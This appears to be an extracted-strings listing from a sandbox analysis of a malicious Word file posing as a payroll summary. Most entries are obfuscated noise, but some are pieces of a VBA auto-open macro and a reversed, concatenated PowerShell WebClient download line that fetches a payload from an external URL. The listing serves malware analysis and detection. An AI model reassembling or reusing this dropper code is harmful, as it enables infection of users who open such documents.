uMkUH(YMHEvAjKbXHX60480Fix(WtYaRY50986PSrYDwio;40718 DnOFX96340yZdQDHy54232yoKiRYS1AtqRzSPM BJkOrIRQYjQBdEVcQpbiimJ@pqmJNu51Qjcrbi>1760PTNOmwQP20585JVoljLA64293QWbPBQQ6119QLomER4APMttXKPupLfisAzi@%DespnZBf%!!%RsCO ukicie31h8415, eRQAMCdnZJu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UMWrAHbUaicddrpmoVqWMOhSpCi6u (.ja6 )sRAHC[0,5 ecalpeRstRQ`,)47]CP[+189rC[( 29!C[,PP9C eCAlpE`r0- 43@)211]c#3h10512 ,2 %18FdpQzOQVmNKWv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UNCAsIntranet
Unicode based on Runtime Data
(powershell.exe
)
UPivBwFXrSbNYwTHwBtsUDDJitRhYQQJrhdAqJBVYaXJUhcqo;SfnVuYKEbwBXkj\fKobWavjbB}orkXz*jWmELDLiDUAqrTXdVLzcrZavjNbJPbXbz>IASBuRLFpzaQUivoEgOLwJkRAMzoLVUwiYRNUvvXphj>WjjtpTDSGIPrKNWlUgJBHVtrSGKvzo?FfBMtENptTJ^|OSfpbfZWJsbplcps.qiTAkE*IoLNdUUUPpj9FrUSpqSNvjhVSMiqFwnIhzGNEV bAYlptYJAGLp!_vOEVSHKOKCaLjjowa9xWzsjOXiPcIlBslOTNhiDbVWb@mNjOa(wUXWttirGdjsozrjmwDdtbirDh0aIOdJrzIWi4BtvOCWluhzQWlpjSMlHisAZ4MnREwPaJliTCVboucEdciAiQY6@rwvzzrzzdIJJJTjUFmkuzoGdnKYZjKpjjBpzzPUTjChvzqmAkSWEVfFTCHqHDClzMKpHXjclqmOWluKp%iVabFr"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uQAuA3moDYX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UqMcbtRa6543ARMpuszV##zpYkToPa2k`jmSULQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
USER32.dll
Ansi based on PCAP Processing
(network.pcap)
uW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
UwQwjLoXpbnm/PJHhSw`24920CdnkJ|90541PbirYCvP74157 fWjmN81529PjWnJtkQ46208QKjiRvn1AQwCpwvQEnd Sub
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
V$@s.smG$i;<3i[Bm U+UXkpGoc)vb#?3'>~ONHi'=z^(0CYs_C}VPj*\c-q8|.et{6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
V.V.V.V.V.V.V.V.V.Project.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@H@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5..[`)TahomaA$BCambria Math"1hee!0iQp@P$Pn^6!xxRyfewujashowavae46504Ryfewujasho58022Oh+'0
Ansi based on Dropped File
(~WRD0003.tmp)
V@GlobalSpaclFalseCreatablPredeHclaIdTru
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
v_R,PlaC,
Ansi based on Image Processing
(screen_0.png)
VBAFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vfrMRtjSaVBtVInzj108940CZvXL6842gQSQ18436BwKHnwL`927* UZwzve9194FQvXcaB@SRuhuM@JPimhzLJTckOfWrnZBf% tes&&r^e=%Sf.W,3545u!e65a3D1Gb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VFzQF`3119WDRoX 72773wuRHknYqjiZKSpWMfD4vv0vssBOBL!JA76976@$BCtidBbOtYhs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Vi7LLkVNwWksWbmhl% t7wL L L L $'x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ViFQic dowlFKYHDjhPL@PFpRWWzPHvPqrDO GFFzXItVWakEMIAAA6sRCFDwmk+ RusqwWVLvDTIQUKjPWqj&N1$+ F+ ljaakrr@ZWhhiPzoPEoHkRptMMvPYQQp+ S+ LshK!:+ w dBSwU0JHpwdEsFLpHcUuaI@cwAkETD ANzhppwCffb+aYof@qzcWsEPUMWrAHbUZiFiTzufdJWjr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Viner Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
VK)NFq"=
Ansi based on PCAP Processing
(network.pcap)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vrDjvITiwAlCa?LshKN'hBTLEd9riDVWs+XlCQGRscnSl+iZHfv^jNQbGmMANYPtujfkZjsTMWXZJYWJUbKQTbjBihNL/oaCbzNe(wVTSGI7PFHVrL^HJhvsO+GwRUlTcbOZZsXkRCRELWzDh:fEwpAxVAmWLiQcwAkETDljGSmk9utKLaLs8jmvUhDwvJaksuWwvrrEDNSgKUdmwLiFRoZrlTzrBsHwefUWrsrHPEfnoCahOjHjokjBVZSKqawnkYHQwQPtHIgvWmWIzoIGYvGaOiQjKOpJOTrlavccWUsnwCswQ$dANzhpidAEH,CjcXvWpHwMtiTUNdvoLbmOtrjjLJDonTFQrrjI]wnRAEfatNhji:[YkDiSJFlZMhf=XfzUiiEUGNS4YjGiLqfbTvhrvRBovrHldULGcMJmVirAqsTLEnrvUTSRaTQ2kEoHkRTcNAkEM"HlvWmoKnFzRNZhUKO)JtsLBidAGoiTrUIjviMbBCfjZqfjskUINS}jnwKmQBQrOHf MZvXvabURHIVtdUbthjrAmZjmumSbICuazXQsljBFnLTwQUbv3mVrmfhhwfOlF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
vv0vssBOtes&&!Jqqqq$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VYszlQ UfqbZaVFinj88605PjjrjuCQ34342QjvwOEOQ 48952dkSkFB962D96WbIQ12142(VQQcm(JEjAtcmViitp`fTZhC&cs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VYXYa|wFzifn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VZSK(awnkA?QwQPtH@116639@vWmWIzb15979oIGYAF17090bOiQj153* OpJOTrAE81761!9vccWnwCswQ@ANzhp&9CGcta%v};EWaerb19;)DCD]St ()JQOme>tIT&-+JDQOk0Q$Oovn(&A@9W`#5291&0d#, %17$idAEHCjcXvW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
W NRNFUElpob
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
w!1AQaq"2B#3Rbr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
W+7`gJj|h(KD-
Ansi based on Dropped File
(~WRD0000.tmp)
W0f0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
w9CamA^Z[\iw0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wdkd!!%F WraW1f1541AM3f1=iKnMwGCOJki
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Webdings
Unicode based on Runtime Data
(WINWORD.EXE
)
wekjwHjEJ
Ansi based on PCAP Processing
(network.pcap)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WGjrDT! fHSpBUGhk2=61@vslbqf1p8670A+!F*B45 bCrjIbJ7312AdFPRMk!F1377BdjzBLj1HBXKFNcBwhXWKd2YZ&p=%TjDEXVkGksKp% @tps2SA29d83 D+ wb,r E19`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Wide Latin
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 2
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 3
Unicode based on Runtime Data
(WINWORD.EXE
)
wLApZdwfUu TckXYpKLZjArsMnvFvmP\RGbuzpUjwiUEAmlUdJWjrl0SNlESh;mYXolIFYEkfi{jjItiWDLuSKWzfCINZzwuNZjwCGmNdKoOja'iiUYOFBbSXJkcaqDAuFmVUSbi0SqfOR0cBJZhJ3SFtVwzpGjDUnuQTwzsIUZFGffShiTLnzWSjJQlGbuLKUKjPWqjNwhihMcobIdmUQrULnYFkSDXTZ1'JwzGSiUVCTUBjEZjiwdoBqls(OmwfcGGmjAqJDEGXjsJmwrYtvOwdioEiPquj-PbjQwucWXmfQMQnoGJPSXZNYIkwBOcWBwSyIjfaPPSbCoZsZljaakrrp=LOsXhrPCiPoS5NnRmJrPGiswwXgjiIbVOdiOaGAQmwKPiidzAZjUvjVnSzqYnfuQfrAiWNRNFU^ElpobH.iUFQp3RdOvDveKRvcN2ZNwjKAkUrcGwzTuLru=QHSNHMcXLJZwJEjZWhhiPzoPBizmmpH8ozAQWj\,vjYsnnLVHOEuwPwUlHL.PVdVdFi0LLBcCMZQQDYIhuTNrJLXLa$2DPhzERwuFUeiZiEuUQnJbJbxCRfIMRvZqiNuxbudJS*UbopsPyQsAkaXX9lohwuSRKwBpTAJqcr_UMWrAHbUn5adpQzOj|mNKWvJ/rrVlUDfWfvNDYGsrtJZwXjjJEzaGSiYVYTbKVjLI2WQZPhSwBkqBWbfpApzIgkVYwUVnDhfMSPMzGGK[bVBtdeYYFGTaEwaNrZyaWLzXMUjphWnsdIwswDLmbsHCMJHpwdEsFLpHtThBtbISvSMoXisUrtCijidhzLYXfEpWAVujiqjDRC0GBOzwJTQbLt-LIHphHswKjHBsvKXfTBFJmBo"QDtHUpimzjfaptdaLl=zIotHHwXznEmGqrEFjfELiUluXtbqHKlwQvf
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wNcCA(McNJhG Ywzjk_8V82GhcXvC90jFhSccjapbP?32iGplBP762`+* Ptjoh5710591wLHqZpFHnwEiA!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WordBibliographyFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
WORDFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
wOucAq(hDKJk!@EAqJsl532UWmhn208ZTLjBzZ4623Fn YvRAW43627FdJsLiE.6989Z GZfYbIuXzPkmusHwkwosI (ZkVOXNdowlFKYHb`Oalji@scpbMN1pcaOz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WpadDecision
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadDecisionReason
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadDecisionTime
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadLastNetwork
Unicode based on Runtime Data
(cmnmspthrd.exe
)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wQd%!=%FvIs0ZC655[+ 7y, %3pBYjaT= rCEAEB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wSkUI = (dfavL / XEioEW@49863Fix(TvdJk)) + 62608 - CLng(PlClo(55253FEiZJaV745 * omrRKdStr(78165)ZFzRqc<Dobjcv)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WUwtHJRpYL%!&,0@Fwrtttt$'J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WuwUb = UVIJw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wVTSGI!PFHVrL@HJhvsO`18327aG wRUlT38864
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WwIwcGJiaDnK
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X X'x z $ ' ~ ' L a vXX OX X'kX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X ` bX'R f'd j lYp n psXX rJ t1kX v xX'h'BZ^c^% & SoEkSiqw2w2Mnnnn$'z ~'| " $ XX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'oAttribute VB_Name = "uIpNwjvi"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'U9CDT2swdMLdmXo% 3pK$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
x0n0Y0y0f0n0Y
Ansi based on PCAP Processing
(network.pcap)
X0ZWTcX %^c^E^L@6L6L6L6L$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Xdlt|Ryfewujashowavae46504Ryfewujasho58022Normal1Microsoft Office Word@@(@Z`+.+,0,x
Ansi based on Dropped File
(~WRD0003.tmp)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XIWIor = owksP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XlCQGR(scnSBliZHfe204714!*jNQbG%8030Hb mMANYPC8296#*tujfk46983*ZjsTMA)93894>WXZJ!sJUbKQTjBihNLoaCbzN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Xwqsp1VpjbAzwDBB1T4662usK jwYwM751985Pudi6N
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XZDHt6=Bk'RE$aTbQ;H-#GXY8*\;aYXVQx
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
x}rxwr:\TZaG*y8IjbRc|XI
Ansi based on Dropped File
(~WRD0000.tmp)
y"?,.x9]BAjF^}m8A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392dX13P JVdCmMEKviN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Yg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
yiZwL0OZ48e(fTa"!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YkIKrRCSNheI7 !%PInYdOqGbm0F6., 729:+ d, 11dBJEU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YuYiBisbSDWsfpOKfL>59sbCzDTA`85184rw BKLzK929534LcwkpE83249:UTiwkA: 70028:uGNaW:ULmXfQ-LYkPzD$jboTkbkkwEvR)@QszoVQ@nzRZ9282(uzjmzg7(TSuqRBP(6915q SkzGv62473(bcmYDtd(425bJ`zVpnP(zOwzZ([Shell] zEBYNhr(vb0KeyCAd+ @zpawOOEKKizpw, `17959
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YY0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
YzanJQquaRidZitba8309Qp GVcXk>55193QNhHwRwQ4753 XuHEz73123PwvWfUP13185P0jqbEPizPYUPcUuaIuHwQpJm`("DF6~E|9.cflsaAx)w1(pe9elDtfIFdaEx@lnWBYU9oDpe9.UYY{yrt{)"XCDA1 ni@ cm UV2UY94h876@@5@=,r 17OB;h sJjlW;OGwUzu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YZjK!=39DKjBpzq9B
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZAVFi piiiSpw"vZ177FwhPC3007vwfHv@k362INCfcBVp2484AAz`XalwTo8AMNZGSV2GCQoeCktSzirLZf#0VWiKK@fO#wPjANo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZAzPCFwSPF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZC~*.!?-XiKf-p9Qy}mmd{(y?<n)nq*=kq-9;xYsU;R(jxOQ@%%,d*e.THRrV&425;62s1|PaTvvNdfr7b@uo6Pj1#wccuOio\ETSnkyqY<R+_A/<cmmu<6n|-bIXnXvf#;wp_Ayk*o<k$r/FR2+<7iji\(H28b2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zGlC (oiMB1<EAtFdM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ziLz/(FnEOtZrQRtIQ88RNh4uu35&AfMKc252473cbluY`08GsKTJC!3098QAmVt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zInzNLA3ndLnvEIJDbA35wA3ZRbBSB3`23509&ArzlaaE365862jLabG!2810ijrWWqE32722B3bNlfYB3Mwuzkv(@ZNUGEb$c zzPaq\iwVGw(YovKzijHdk&4K/ (iCQTmm9x3(N0nPzh#55246zddzJ(41(Zwbmw%9640"V`qlqodbcjjUCKAfMvWNidAm
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZiwzPqjMnTF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zjJp)UlVTiuDr 4X0ZWTcX %eE^L1l+ 12,`p + "kEuwRuNGdUQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zMOcbzVndNaJbZX$jw67URtTbI1260AHCW501782istCuQJ48447p@bpdJOoU650'MqSfq!smTBQsRCFDzprwV!qcuLA]uznHTbGiPFGnYsGFvi`NcBwhXWKxtsUDDJQ,+ UWifd!<vldhd!^+ QMWPujSmEUrpOkhrC`fPR tRoqAmOLCQVHchDSGIPrKNWlUNhiDbVqfSJSUZBbKMcdWaKzqmAk@SWEVfFJPimhzLJTwBQQMR+ iZKSpWMfDAcNa wKTwHYA1jzuS+ AcR+ ZIZ"HGiADLNKKN@pBLVYE0ZbLI+ upLfisAzmViitpfTZhNUjT@pWHKiof@wLFvsQRCSNpbOkGzH1hihCHw!KiwzK;op/ YzGisA5371qijCG 8286srofnY+ V9COoUq?+ 493360# ZAMOY{4504;JWUbbBv1zErS1qXMFK"pRrT;QbFJaW(tnocH@USlIvR432
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zPHvPqrDOGFFzXItVWakEMIAtF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zqmAkS0WEVfQo$4fiIIkw9z"u253+ 3, .TCHqHDClzMKp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zQ~'^uk4].E,kwvO95.I@bt/r9^9O0p*t]Uy\ut#4b5T|Y\J IpVMxu8sm#D3Gk?709eR`zWc^sL6j>lmxby<,q+4UMx<ln);>~u~f`X+=?m7D+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZSfoiXzjhizojGfzhAmTzv~KCrItXivPwPyaLajmWxJwHfcWdrUhiJ-HLpBp]fXSnU4hRpYBBFIlzW[pTiPO{JYMGVW@NwpzcnSTfGnWOSuP@MpCZdvldhdBXtcRffrlumHXi#UfPwjkEBwobGQHYvPVaKAoAKjGvPjZGqsridDYoVrsBszUOHiQNRpuUHE#BXTcAHY!zGlCJ2oiMBX~EAtFdM7xnlkfhTVNRtGp"BrkizjwWAwdOYljMWFqwwNzfSJSUkp`idOnFDlbEpEIry`LSLNGO1WVVJARv ufBWdasmIYK[TwcDi,XniGkwgIEnoIZnhfjQTzjCpwBNmdmLHtDoQjgwSkUI,dfavL]XEioEW TvdJk2PlClov-EiZJaomrRKWZFzRqc!DobjcvoBbKMcdWaK]UtXKXzzAOuvkfIms>rapjDTAdBtwa\:FuPjttZqFWUuBiIkmMUrZz!GQUzOf^tGwPPjofOOCi;ozCKGjVYszlUfqbZ~aVFinjWjjrjuCSjvwOEOfdkSkFBioWbIzNVQQcmJEjAtv.`mViitpfTZhCiKnMwGCOJki:nuYaJa`VlbwolneUjjkMZijPMIHHjw3OfIrSSMzaJn1<fZXYicQoLwhAlSXBiqv[mAmbBIerqMrZCOYKZjUcECKSNWUHVWIFXCwAzjCddTIzRJCYOwcJoXFWFWCL [cNawKTwH+TnXnUqHGTIo/NNOWpL(qZHutcLBbdRMtVai6sbiTVEGzPKiV>sifrJ)pcMRAUmvKWnwzerOipTk5SwEtQfJ|vfrMRtojSaVtm$CInzjmCZvXLzPQSQA`wKHnwLRUZwzv>QvXcW4SRuhuM9JPimhzLJT:cJCdlikKdsvq}ctFWYNXIAXtYLmEjtMFBzRvMPaYAjitj<VTGpuJyNAQdjfzjunaMeNlfcWMpZjXEv$YoZbzwE"iNOFFqjAwXc/VhpfifEDwXbn~jILhiAjCwUZnzbOtzRriiPqiSIbXpBLVYEZbLId|6rkquEpwbjkTdLYz7yZQmLtAwolsYp[jCiCIrJzVlDBKBESfKQjqBtDDDzY0RvIPSNrPiRHXmaMztiXBjUMVUBCmDiIGuViTW(hUdPwIiVlfzQirQREBvOdPSjfWdBEhENICnwBQQMRvBYjaddrCEAEB0PljtmTqGIUfl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZsWYY(FwfKvYiWMME/ 9317WzXkllo96039eYikkzfe473CQlYu"V871K* EjBnf331AbWdWUiclnmwHA(LBq`DsrNl`$CiBE3h@/4d45AQT/moc.aoDsi/$0/:pt`zoaR/ppa-ppw/k@rnEp@<5230Asb, E92@HbKnnTtwzL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zTZADLcFXJtFRE=0, 0, 0, 0, C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Zu-;iRxM D[brNi2i}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zWH<:b8Cc5<<w=8yukg"W#5v9otmfbMI2+wz<QX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zWzzYA(rIFH`V0hDkV`aR/ AVpCpwLr4 f}wkwRRD
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zXVB#QDViwzORjzYw96172pAnjzLN649(rbASwBKE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zYhBF(mGwQW`Rfjaf66422dAEQmLd1]8VsAlWcKT57507AdFPNTM22368dutMYEAA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZzGUKZNoTj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zZIBSu9787l`wqiFD0U LjPTV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
